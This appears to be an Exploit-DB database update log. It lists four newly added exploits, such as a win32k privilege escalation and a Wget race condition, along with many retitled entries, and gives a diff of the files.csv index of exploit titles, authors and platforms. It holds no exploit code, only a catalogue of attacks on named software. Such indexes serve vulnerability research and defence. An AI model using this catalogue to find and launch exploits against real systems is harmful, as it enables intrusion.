DB: 2016-11-25

4 new exploits

Groupwise 7.0 - (mailto: scheme) Buffer Overflow (PoC)
Groupwise 7.0 - 'mailto: scheme' Buffer Overflow (PoC)

Remote Utilities Host 6.3 - Denial of Service

Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)

GNU Wget < 1.18 - Access List Bypass / Race Condition

miniBB - 'user' Input Validation Hole
MiniBB 1.7f - 'user' Parameter SQL Injection

TR Newsportal 0.36tr1 - (poll.php) Remote File Inclusion
TR Newsportal 0.36tr1 - 'poll.php' Remote File Inclusion

PHP Forge 3 Beta 2 - (cfg_racine) Remote File Inclusion
PHP Forge 3 Beta 2 - 'cfg_racine' Parameter Remote File Inclusion

miniBB keyword_replacer 1.0 - (pathToFiles) File Inclusion
MiniBB keyword_replacer 1.0 - 'pathToFiles' Parameter File Inclusion

miniBB 2.0.2 - (bb_func_txt.php) Remote File Inclusion
MiniBB 2.0.2 - 'bb_func_txt.php' Remote File Inclusion

W1L3D4 philboard 0.2 - (W1L3D4_bolum.asp forumid) SQL Injection
W1L3D4 philboard 0.2 - 'W1L3D4_bolum.asp' SQL Injection

miniBB 2.1 - (table) SQL Injection
MiniBB 2.1 - 'table' Parameter SQL Injection

Joovili 3.0.6 - (joovili.images.php) Remote File Disclosure
Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure
Apartment Search Script - 'listtest.php r' SQL Injection
XOOPS Module Recipe - 'detail.php id' SQL Injection
Aterr 0.9.1 - (class) Local File Inclusion (PHP5)
W1L3D4 philboard 1.0 - (philboard_reply.asp) SQL Injection
Apartment Search Script - 'listtest.php' SQL Injection
XOOPS Module Recipe 2.2 - 'detail.php' SQL Injection
Aterr 0.9.1 - Local File Inclusion (PHP5)
W1L3D4 philboard 1.0 - 'philboard_reply.asp' SQL Injection
KubeLance 1.6.4 - (ipn.php i) Local File Inclusion
acidcat CMS 3.4.1 - Multiple Vulnerabilities
BlogWorx 1.0 - (view.asp id) SQL Injection
Crazy Goomba 1.2.1 - 'id' SQL Injection
RedDot CMS 7.5 - (LngId) SQL Injection
TR News 2.1 - (nb) SQL Injection
KubeLance 1.6.4 - 'ipn.php' Local File Inclusion
Acidcat CMS 3.4.1 - Multiple Vulnerabilities
BlogWorx 1.0 - 'id' Parameter SQL Injection
Crazy Goomba 1.2.1 - 'id' Parameter SQL Injection
RedDot CMS 7.5 - 'LngId' Parameter SQL Injection
TR News 2.1 - 'nb' Parameter SQL Injection
E RESERV 2.1 - (index.php ID_loc) SQL Injection
Joomla! Component Filiale 1.0.4 - (idFiliale) SQL Injection
E RESERV 2.1 - 'index.php' SQL Injection
Joomla! Component Filiale 1.0.4 - 'idFiliale' Parameter SQL Injection
minibb 2.2 - (Cross-Site Scripting / SQL Injection / Full Path Disclosure) Multiple Vulnerabilities
PostNuke Module PostSchedule - (eid) SQL Injection
MiniBB 2.2 - Cross-Site Scripting / SQL Injection / Full Path Disclosure
PostNuke Module PostSchedule 1.0 - 'eid' Parameter SQL Injection

Siteman 2.x - (Code Execution / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Siteman 2.x - Code Execution / Local File Inclusion / Cross-Site Scripting

PHP Forge 3 Beta 2 - 'id' SQL Injection
PHP Forge 3 Beta 2 - 'id' Parameter SQL Injection
megabbs forum 2.2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Jokes Site Script - 'jokes.php?catagorie' SQL Injection
FluentCMS - 'view.php sid' SQL Injection
megabbs forum 2.2 - SQL Injection / Cross-Site Scripting
Jokes Site Script - 'jokes.php' SQL Injection
FluentCMS - 'view.php' SQL Injection
Prozilla Hosting Index - 'Directory.php cat_id' SQL Injection
Softbiz Web Host Directory Script (host_id) - SQL Injection
Joovili 3.1 - (browse.videos.php category) SQL Injection
Prozilla Hosting Index - 'cat_id' Parameter SQL Injection
Softbiz Web Host Directory Script - 'host_id' Parameter SQL Injection
Joovili 3.1 - 'browse.videos.php' SQL Injection

w1l3d4 philboard 1.2 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
W1L3D4 philboard 1.2 - Blind SQL Injection / Cross-Site Scripting

apartment search script - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities
Apartment Search Script - Arbitrary File Upload / Cross-Site Scripting

Mini Web Calendar 1.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Mini Web Calendar 1.2 - File Disclosure / Cross-Site Scripting

Prozilla Hosting Index - 'id' SQL Injection
Prozilla Hosting Index - 'id' Parameter SQL Injection

web Calendar system 3.12/3.30 - Multiple Vulnerabilities
Web Calendar System 3.12/3.30 - Multiple Vulnerabilities

Web Calendar 4.1 - (Authentication Bypass) SQL Injection
Web Calendar 4.1 - Authentication Bypass

web Calendar system 3.40 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Web Calendar System 3.40 - Cross-Site Scripting / SQL Injection

KubeLance - 'profile.php?id' SQL Injection
KubeLance 1.7.6 - 'profile.php' SQL Injection

Clever Copy 2.0 - calendar.php Cross-Site Scripting
Clever Copy 2.0 - 'calendar.php' Cross-Site Scripting
Clever Copy 2.0 - results.php Multiple Parameter Cross-Site Scripting
Clever Copy 2.0 - categorysearch.php Multiple Parameter Cross-Site Scripting
Clever Copy 2.0 - 'results.php' Cross-Site Scripting
Clever Copy 2.0 - 'categorysearch.php' Cross-Site Scripting
Acidcat CMS 2.1.13 - default.asp ID Parameter SQL Injection
Acidcat CMS 2.1.13 - acidcat.mdb Remote Information Disclosure
Acidcat CMS 2.1.13 - 'ID' Parameter SQL Injection
Acidcat CMS 2.1.13 - 'acidcat.mdb' Remote Information Disclosure

ODFaq 2.1 - faq.php SQL Injection
ODFaq 2.1 - 'faq.php' SQL Injection

MiniBB 1.5 - news.php Remote File Inclusion
MiniBB 1.5 - 'news.php' Remote File Inclusion

W1L3D4 philboard 0.3 - W1L3D4_Aramasonuc.asp Cross-Site Scripting
W1L3D4 philboard 0.3 - Cross-Site Scripting

Proverbs Web Calendar 1.1 - Password Parameter SQL Injection
Proverbs Web Calendar 1.1 - 'Password' Parameter SQL Injection

Chimaera Project Aterr 0.9.1 - Multiple Local File Inclusion

miniBB 2.2 - 'bb_admin.php' Cross-Site Scripting

miniBB RSS 2.0 Plugin - Multiple Remote File Inclusion
MiniBB RSS 2.0 Plugin - Multiple Remote File Inclusion

DevWorx BlogWorx 1.0 - 'forum.asp' Cross-Site Scripting

eZoneScripts Apartment Search Script - 'listtest.php' SQL Injection

miniBB 3.1 - Blind SQL Injection
MiniBB 3.1 - Blind SQL Injection

Osticket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting

files.csv

@@ -727,7 +727,7 @@ id,file,description,date,author,platform,type,port
 5458,platforms/linux/dos/5458.txt,"Xine-Lib 1.1.12 - NSF demuxer Stack Overflow (PoC)",2008-04-16,"Guido Landi",linux,dos,0
 5460,platforms/windows/dos/5460.html,"Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Denial of Service (PoC)",2008-04-17,"Shennan Wang",windows,dos,0
 5472,platforms/windows/dos/5472.py,"SubEdit Player build 4066 - subtitle Buffer Overflow (PoC)",2008-04-19,grzdyl,windows,dos,0
-5515,platforms/windows/dos/5515.txt,"Groupwise 7.0 - (mailto: scheme) Buffer Overflow (PoC)",2008-04-28,"Juan Yacubian",windows,dos,0
+5515,platforms/windows/dos/5515.txt,"Groupwise 7.0 - 'mailto: scheme' Buffer Overflow (PoC)",2008-04-28,"Juan Yacubian",windows,dos,0
 5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers Denial of Service",2008-05-05,Nicob,windows,dos,0
 5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 - iso_recv_msg() Integer Underflow (PoC)",2008-05-08,"Guido Landi",linux,dos,0
 5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - process_redirect_pdu() BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0
@@ -3987,6 +3987,7 @@ id,file,description,date,author,platform,type,port
 31707,platforms/windows/dos/31707.txt,"Computer Associates ARCserve Backup Discovery Service Remote - Denial of Service",2008-04-24,"Luigi Auriemma",windows,dos,0
 31710,platforms/novell/dos/31710.txt,"Novell Groupwise 7.0 - HTML Injection / Denial of Service",2008-04-26,"Juan Pablo Lopez Yacubian",novell,dos,0
 31711,platforms/windows/dos/31711.html,"Microsoft Excel 2007 - JavaScript Code Remote Denial of Service",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos,0
+40825,platforms/windows/dos/40825.py,"Remote Utilities Host 6.3 - Denial of Service",2016-11-24,"Peter Baris",windows,dos,0
 31713,platforms/linux/dos/31713.py,"PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",linux,dos,0
 31728,platforms/multiple/dos/31728.txt,"Call of Duty 4 1.5 - Malformed 'stats' command Denial of Service",2008-05-02,"Luigi Auriemma",multiple,dos,0
 31748,platforms/windows/dos/31748.txt,"Yahoo! Assistant 3.6 - 'yNotifier.dll' ActiveX Control Memory Corruption",2008-05-06,Sowhat,windows,dos,0
@@ -8163,6 +8164,7 @@ id,file,description,date,author,platform,type,port
 33360,platforms/windows/local/33360.c,"Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation",2009-11-16,Evilcry,windows,local,0
 33387,platforms/linux/local/33387.txt,"Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0
 33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0
+40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)",2016-11-24,IOactive,windows,local,0
 33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0
 33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
 33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0
@@ -15094,6 +15096,7 @@ id,file,description,date,author,platform,type,port
 40778,platforms/windows/remote/40778.py,"FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow",2016-11-18,Th3GundY,windows,remote,0
 40805,platforms/multiple/remote/40805.rb,"Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80
 40813,platforms/hardware/remote/40813.txt,"Crestron AM-100 - Multiple Vulnerabilities",2016-11-22,"Zach Lanier",hardware,remote,0
+40824,platforms/multiple/remote/40824.py,"GNU Wget < 1.18 - Access List Bypass / Race Condition",2016-11-24,"Dawid Golunski",multiple,remote,80
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15721,7 +15724,7 @@ id,file,description,date,author,platform,type,port
 574,platforms/php/webapps/574.txt,"ocPortal 1.0.3 - Remote File Inclusion",2004-10-13,Exoduks,php,webapps,0
 630,platforms/php/webapps/630.pl,"UBB.Threads 6.2.x < 6.3x - One Char Brute Force Exploit",2004-11-15,RusH,php,webapps,0
 631,platforms/php/webapps/631.txt,"vBulletin - LAST.php SQL Injection",2004-11-15,anonymous,php,webapps,0
-635,platforms/php/webapps/635.txt,"miniBB - 'user' Input Validation Hole",2004-11-16,anonymous,php,webapps,0
+635,platforms/php/webapps/635.txt,"MiniBB 1.7f - 'user' Parameter SQL Injection",2004-11-16,anonymous,php,webapps,0
 642,platforms/cgi/webapps/642.pl,"TWiki 20030201 - search.pm Remote Command Execution",2004-11-20,RoMaNSoFt,cgi,webapps,0
 645,platforms/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,php,webapps,0
 647,platforms/php/webapps/647.pl,"phpBB 2.0.10 - Remote Command Execution",2004-11-22,RusH,php,webapps,0
@@ -16095,7 +16098,7 @@ id,file,description,date,author,platform,type,port
 1779,platforms/php/webapps/1779.txt,"PHP Blue Dragon CMS 2.9 - Remote File Inclusion",2006-05-12,Kacper,php,webapps,0
 1780,platforms/php/webapps/1780.php,"phpBB 2.0.20 - (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0
 1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0
-1789,platforms/php/webapps/1789.txt,"TR Newsportal 0.36tr1 - (poll.php) Remote File Inclusion",2006-05-15,Kacper,php,webapps,0
+1789,platforms/php/webapps/1789.txt,"TR Newsportal 0.36tr1 - 'poll.php' Remote File Inclusion",2006-05-15,Kacper,php,webapps,0
 1790,platforms/php/webapps/1790.txt,"Squirrelcart 2.2.0 - (cart_content.php) Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0
 1793,platforms/php/webapps/1793.pl,"DeluxeBB 1.06 - (name) SQL Injection (mq=off)",2006-05-15,KingOfSka,php,webapps,0
 1795,platforms/php/webapps/1795.txt,"ezusermanager 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0
@@ -16275,7 +16278,7 @@ id,file,description,date,author,platform,type,port
 2046,platforms/php/webapps/2046.txt,"iManage CMS 4.0.12 - 'absolute_path' Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0
 2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - (SD_DIR) Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0
 2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0
-2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - (cfg_racine) Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0
+2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - 'cfg_racine' Parameter Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0
 2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - 'help.php' Remote File Inclusion",2006-07-23,magnific,php,webapps,0
 2062,platforms/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0
 2063,platforms/php/webapps/2063.txt,"ArticlesOne 07232006 - (page) Remote File Inclusion",2006-07-23,CyberLord,php,webapps,0
@@ -16645,7 +16648,7 @@ id,file,description,date,author,platform,type,port
 2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod 0.1.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0
 2526,platforms/php/webapps/2526.txt,"PHPht Topsites - 'common.php' Remote File Inclusion",2006-10-12,"Mehmet Ince",php,webapps,0
 2527,platforms/php/webapps/2527.c,"Invision Gallery 2.0.7 (Linux) - readfile() / SQL Injection",2006-10-12,ShadOS,php,webapps,0
-2528,platforms/php/webapps/2528.txt,"miniBB keyword_replacer 1.0 - (pathToFiles) File Inclusion",2006-10-12,Kw3[R]Ln,php,webapps,0
+2528,platforms/php/webapps/2528.txt,"MiniBB keyword_replacer 1.0 - 'pathToFiles' Parameter File Inclusion",2006-10-12,Kw3[R]Ln,php,webapps,0
 2529,platforms/php/webapps/2529.txt,"AFGB Guestbook 2.2 - (Htmls) Remote File Inclusion",2006-10-12,mdx,php,webapps,0
 2531,platforms/php/webapps/2531.txt,"phpBB Import Tools Mod 0.1.4 - Remote File Inclusion",2006-10-12,boecke,php,webapps,0
 2532,platforms/php/webapps/2532.txt,"phpBB Ajax Shoutbox 0.0.5 - Remote File Inclusion",2006-10-12,boecke,php,webapps,0
@@ -16743,7 +16746,7 @@ id,file,description,date,author,platform,type,port
 2652,platforms/php/webapps/2652.htm,"PHP League 0.81 - 'config.php' Remote File Inclusion",2006-10-25,ajann,php,webapps,0
 2653,platforms/php/webapps/2653.txt,"MPCS 1.0 - (path) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0
 2654,platforms/php/webapps/2654.txt,"ask_rave 0.9 PR - (end.php footfile) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0
-2655,platforms/php/webapps/2655.php,"miniBB 2.0.2 - (bb_func_txt.php) Remote File Inclusion",2006-10-26,Kacper,php,webapps,0
+2655,platforms/php/webapps/2655.php,"MiniBB 2.0.2 - 'bb_func_txt.php' Remote File Inclusion",2006-10-26,Kacper,php,webapps,0
 2656,platforms/php/webapps/2656.txt,"MiniBill 20061010 - 'menu_builder.php' File Inclusion",2006-10-26,"Mehmet Ince",php,webapps,0
 2658,platforms/php/webapps/2658.php,"Light Blog Remote - Multiple Vulnerabilities",2006-10-27,BlackHawk,php,webapps,0
 2659,platforms/php/webapps/2659.php,"N/X WCMS 4.1 - (nxheader.inc.php) Remote File Inclusion",2006-10-27,Kacper,php,webapps,0
@@ -17539,7 +17542,7 @@ id,file,description,date,author,platform,type,port
 3901,platforms/php/webapps/3901.txt,"maGAZIn 2.0 - (PHPThumb.php src) Remote File Disclosure",2007-05-11,Dj7xpl,php,webapps,0
 3902,platforms/php/webapps/3902.txt,"R2K Gallery 1.7 - (galeria.php lang2) Local File Inclusion",2007-05-11,Dj7xpl,php,webapps,0
 3903,platforms/php/webapps/3903.php,"Monalbum 0.8.7 - Remote Code Execution",2007-05-11,Dj7xpl,php,webapps,0
-3905,platforms/asp/webapps/3905.txt,"W1L3D4 philboard 0.2 - (W1L3D4_bolum.asp forumid) SQL Injection",2007-05-11,gsy,asp,webapps,0
+3905,platforms/asp/webapps/3905.txt,"W1L3D4 philboard 0.2 - 'W1L3D4_bolum.asp' SQL Injection",2007-05-11,gsy,asp,webapps,0
 3906,platforms/php/webapps/3906.htm,"PHP FirstPost 0.1 - (block.php Include) Remote File Inclusion",2007-05-12,Dj7xpl,php,webapps,0
 3907,platforms/php/webapps/3907.txt,"iG Shop 1.4 - (page.php) SQL Injection",2007-05-12,gsy,php,webapps,0
 3908,platforms/php/webapps/3908.txt,"YAAP 1.5 - __autoload() Remote File Inclusion",2007-05-12,3l3ctric-Cracker,php,webapps,0
@@ -17934,7 +17937,7 @@ id,file,description,date,author,platform,type,port
 4582,platforms/php/webapps/4582.txt,"teatro 1.6 - (basePath) Remote File Inclusion",2007-10-28,"Alkomandoz Hacker",php,webapps,0
 4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 - Remote File Inclusion",2007-10-29,r00t@zapak.com,php,webapps,0
 4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Arbitrary File Upload",2007-10-29,r00t@zapak.com,php,webapps,0
-4587,platforms/php/webapps/4587.txt,"miniBB 2.1 - (table) SQL Injection",2007-10-30,irk4z,php,webapps,0
+4587,platforms/php/webapps/4587.txt,"MiniBB 2.1 - 'table' Parameter SQL Injection",2007-10-30,irk4z,php,webapps,0
 4588,platforms/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 - (dir_ws) Remote File Inclusion",2007-10-30,BiNgZa,php,webapps,0
 4589,platforms/php/webapps/4589.htm,"PHP-AGTC Membership System 1.1a - Remote Add Admin",2007-10-30,0x90,php,webapps,0
 4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - (file) Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0
@@ -18090,7 +18093,7 @@ id,file,description,date,author,platform,type,port
 4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0
 4796,platforms/php/webapps/4796.txt,"PNPHPBB2 <= 1.2i - (printview.php PHPEx) Local File Inclusion",2007-12-26,irk4z,php,webapps,0
 4798,platforms/php/webapps/4798.php,"ZeusCMS 0.3 - Blind SQL Injection",2007-12-27,EgiX,php,webapps,0
-4799,platforms/php/webapps/4799.txt,"Joovili 3.0.6 - (joovili.images.php) Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0
+4799,platforms/php/webapps/4799.txt,"Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0
 4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 - showcode.php Remote Command Execution",2007-12-28,MhZ91,php,webapps,0
 4802,platforms/php/webapps/4802.txt,"XCMS 1.82 - Local/Remote File Inclusion",2007-12-28,nexen,php,webapps,0
 4804,platforms/php/webapps/4804.txt,"Hot or Not Clone by Jnshosts.com - Database Backup Dump",2007-12-28,RoMaNcYxHaCkEr,php,webapps,0
@@ -18576,46 +18579,46 @@ id,file,description,date,author,platform,type,port
 5468,platforms/php/webapps/5468.txt,"Simple Customer 1.2 - 'contact.php' SQL Injection",2008-04-18,t0pP8uZz,php,webapps,0
 5469,platforms/php/webapps/5469.txt,"AllMyGuests 0.4.1 - 'AMG_id' Parameter SQL Injection",2008-04-19,Player,php,webapps,0
 5470,platforms/php/webapps/5470.py,"PHP-Fusion 6.01.14 - Blind SQL Injection",2008-04-19,The:Paradox,php,webapps,0
-5471,platforms/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php r' SQL Injection",2008-04-19,Crackers_Child,php,webapps,0
-5473,platforms/php/webapps/5473.pl,"XOOPS Module Recipe - 'detail.php id' SQL Injection",2008-04-19,S@BUN,php,webapps,0
-5474,platforms/php/webapps/5474.txt,"Aterr 0.9.1 - (class) Local File Inclusion (PHP5)",2008-04-19,KnocKout,php,webapps,0
-5475,platforms/asp/webapps/5475.txt,"W1L3D4 philboard 1.0 - (philboard_reply.asp) SQL Injection",2008-04-20,U238,asp,webapps,0
+5471,platforms/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php' SQL Injection",2008-04-19,Crackers_Child,php,webapps,0
+5473,platforms/php/webapps/5473.pl,"XOOPS Module Recipe 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,php,webapps,0
+5474,platforms/php/webapps/5474.txt,"Aterr 0.9.1 - Local File Inclusion (PHP5)",2008-04-19,KnocKout,php,webapps,0
+5475,platforms/asp/webapps/5475.txt,"W1L3D4 philboard 1.0 - 'philboard_reply.asp' SQL Injection",2008-04-20,U238,asp,webapps,0
 5476,platforms/php/webapps/5476.txt,"HostDirectory Pro - Insecure Cookie Handling",2008-04-20,Crackers_Child,php,webapps,0
-5477,platforms/php/webapps/5477.txt,"KubeLance 1.6.4 - (ipn.php i) Local File Inclusion",2008-04-20,Crackers_Child,php,webapps,0
-5478,platforms/php/webapps/5478.txt,"acidcat CMS 3.4.1 - Multiple Vulnerabilities",2008-04-20,BugReport.IR,php,webapps,0
-5480,platforms/php/webapps/5480.txt,"BlogWorx 1.0 - (view.asp id) SQL Injection",2008-04-21,U238,php,webapps,0
-5481,platforms/php/webapps/5481.txt,"Crazy Goomba 1.2.1 - 'id' SQL Injection",2008-04-21,ZoRLu,php,webapps,0
-5482,platforms/asp/webapps/5482.py,"RedDot CMS 7.5 - (LngId) SQL Injection",2008-04-21,"IRM Plc.",asp,webapps,0
-5483,platforms/php/webapps/5483.txt,"TR News 2.1 - (nb) SQL Injection",2008-04-21,His0k4,php,webapps,0
+5477,platforms/php/webapps/5477.txt,"KubeLance 1.6.4 - 'ipn.php' Local File Inclusion",2008-04-20,Crackers_Child,php,webapps,0
+5478,platforms/php/webapps/5478.txt,"Acidcat CMS 3.4.1 - Multiple Vulnerabilities",2008-04-20,BugReport.IR,php,webapps,0
+5480,platforms/php/webapps/5480.txt,"BlogWorx 1.0 - 'id' Parameter SQL Injection",2008-04-21,U238,php,webapps,0
+5481,platforms/php/webapps/5481.txt,"Crazy Goomba 1.2.1 - 'id' Parameter SQL Injection",2008-04-21,ZoRLu,php,webapps,0
+5482,platforms/asp/webapps/5482.py,"RedDot CMS 7.5 - 'LngId' Parameter SQL Injection",2008-04-21,"IRM Plc.",asp,webapps,0
+5483,platforms/php/webapps/5483.txt,"TR News 2.1 - 'nb' Parameter SQL Injection",2008-04-21,His0k4,php,webapps,0
 5484,platforms/php/webapps/5484.txt,"Joomla! Component FlippingBook 1.0.4 - SQL Injection",2008-04-22,cO2,php,webapps,0
 5485,platforms/php/webapps/5485.pl,"Web Calendar 4.1 - Blind SQL Injection",2008-04-22,t0pP8uZz,php,webapps,0
 5486,platforms/php/webapps/5486.txt,"WordPress Plugin Spreadsheet 0.6 - SQL Injection",2008-04-22,1ten0.0net1,php,webapps,0
-5487,platforms/php/webapps/5487.txt,"E RESERV 2.1 - (index.php ID_loc) SQL Injection",2008-04-23,JIKO,php,webapps,0
-5488,platforms/php/webapps/5488.txt,"Joomla! Component Filiale 1.0.4 - (idFiliale) SQL Injection",2008-04-23,str0xo,php,webapps,0
+5487,platforms/php/webapps/5487.txt,"E RESERV 2.1 - 'index.php' SQL Injection",2008-04-23,JIKO,php,webapps,0
+5488,platforms/php/webapps/5488.txt,"Joomla! Component Filiale 1.0.4 - 'idFiliale' Parameter SQL Injection",2008-04-23,str0xo,php,webapps,0
 5490,platforms/php/webapps/5490.pl,"YouTube Clone Script - 'spages.php' Remote Code Execution",2008-04-23,Inphex,php,webapps,0
 5491,platforms/php/webapps/5491.txt,"Joomla! Component Community Builder 1.0.1 - Blind SQL Injection",2008-04-23,$hur!k'n,php,webapps,0
 5493,platforms/php/webapps/5493.txt,"Joomla! Component JPad 1.0 - Authenticated SQL Injection",2008-04-24,His0k4,php,webapps,0
-5494,platforms/php/webapps/5494.txt,"minibb 2.2 - (Cross-Site Scripting / SQL Injection / Full Path Disclosure) Multiple Vulnerabilities",2008-04-25,girex,php,webapps,0
-5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule - (eid) SQL Injection",2008-04-25,Kacper,php,webapps,0
+5494,platforms/php/webapps/5494.txt,"MiniBB 2.2 - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2008-04-25,girex,php,webapps,0
+5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule 1.0 - 'eid' Parameter SQL Injection",2008-04-25,Kacper,php,webapps,0
 5497,platforms/php/webapps/5497.txt,"Joomla! Component Joomla-Visites 1.1 RC2 - Remote File Inclusion",2008-04-25,NoGe,php,webapps,0
-5499,platforms/php/webapps/5499.txt,"Siteman 2.x - (Code Execution / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-04-26,"Khashayar Fereidani",php,webapps,0
+5499,platforms/php/webapps/5499.txt,"Siteman 2.x - Code Execution / Local File Inclusion / Cross-Site Scripting",2008-04-26,"Khashayar Fereidani",php,webapps,0
 5500,platforms/php/webapps/5500.txt,"PostNuke Module pnFlashGames 2.5 - SQL Injection",2008-04-26,Kacper,php,webapps,0
 5501,platforms/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 - Remote File Inclusion",2008-04-26,RoMaNcYxHaCkEr,php,webapps,0
 5502,platforms/php/webapps/5502.pl,"Clever Copy 3.0 - 'postview.php' SQL Injection (1)",2008-04-26,U238,php,webapps,0
 5503,platforms/asp/webapps/5503.txt,"Angelo-Emlak 1.0 - Multiple SQL Injections",2008-04-26,U238,asp,webapps,0
-5504,platforms/php/webapps/5504.txt,"PHP Forge 3 Beta 2 - 'id' SQL Injection",2008-04-26,JIKO,php,webapps,0
+5504,platforms/php/webapps/5504.txt,"PHP Forge 3 Beta 2 - 'id' Parameter SQL Injection",2008-04-26,JIKO,php,webapps,0
 5505,platforms/php/webapps/5505.txt,"RunCMS Module MyArticles 0.6 Beta-1 - SQL Injection",2008-04-26,Cr@zy_King,php,webapps,0
 5506,platforms/php/webapps/5506.txt,"PHPizabi 0.848b C1 HFP3 - Database Information Disclosure",2008-04-26,YOUCODE,php,webapps,0
-5507,platforms/asp/webapps/5507.txt,"megabbs forum 2.2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-04-27,BugReport.IR,asp,webapps,0
-5508,platforms/php/webapps/5508.txt,"Jokes Site Script - 'jokes.php?catagorie' SQL Injection",2008-04-27,ProgenTR,php,webapps,0
-5509,platforms/php/webapps/5509.txt,"FluentCMS - 'view.php sid' SQL Injection",2008-04-27,cO2,php,webapps,0
+5507,platforms/asp/webapps/5507.txt,"megabbs forum 2.2 - SQL Injection / Cross-Site Scripting",2008-04-27,BugReport.IR,asp,webapps,0
+5508,platforms/php/webapps/5508.txt,"Jokes Site Script - 'jokes.php' SQL Injection",2008-04-27,ProgenTR,php,webapps,0
+5509,platforms/php/webapps/5509.txt,"FluentCMS - 'view.php' SQL Injection",2008-04-27,cO2,php,webapps,0
 5510,platforms/php/webapps/5510.txt,"Content Management System for Phprojekt 0.6.1 - File Disclosure",2008-04-27,Houssamix,php,webapps,0
 5512,platforms/php/webapps/5512.pl,"Joomla! Component Alphacontent 2.5.8 - Blind SQL Injection",2008-04-27,cO2,php,webapps,0
 5513,platforms/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection",2008-04-27,cO2,php,webapps,0
 5514,platforms/php/webapps/5514.pl,"Joomla! Component paxxgallery 0.2 - 'gid' Parameter Blind SQL Injection",2008-04-27,ZAMUT,php,webapps,0
